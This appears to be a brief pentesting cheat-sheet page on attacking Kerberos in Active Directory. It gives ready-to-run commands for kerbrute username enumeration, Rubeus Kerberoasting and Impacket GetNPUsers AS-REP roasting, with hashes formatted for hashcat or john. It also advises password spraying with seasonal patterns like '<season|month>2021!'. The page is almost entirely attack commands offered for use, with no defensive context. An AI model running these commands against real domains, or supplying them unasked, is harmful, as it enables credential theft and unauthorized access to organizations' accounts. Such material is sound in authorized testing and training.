Methods of attacking kerberos.
Command
Description
./kerbrute userenum -d <fqdn> --dc <dc_ip> userlist.txt
Enumerate Valid Usernames. Enumerating valid usernames greatly increases the likelihood of successful password attacks.
Rubeus.exe Kerberoast
This can be done two ways.
Rubeus.exe kerberoast
Check ASREPRoast with list of users enumerated (no credentials required) python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
With the list of usernames recovered, select one or two password to spray. Start with something like <season|month>2021!
<season|month>2021!
Last updated 3 years ago
Was this helpful?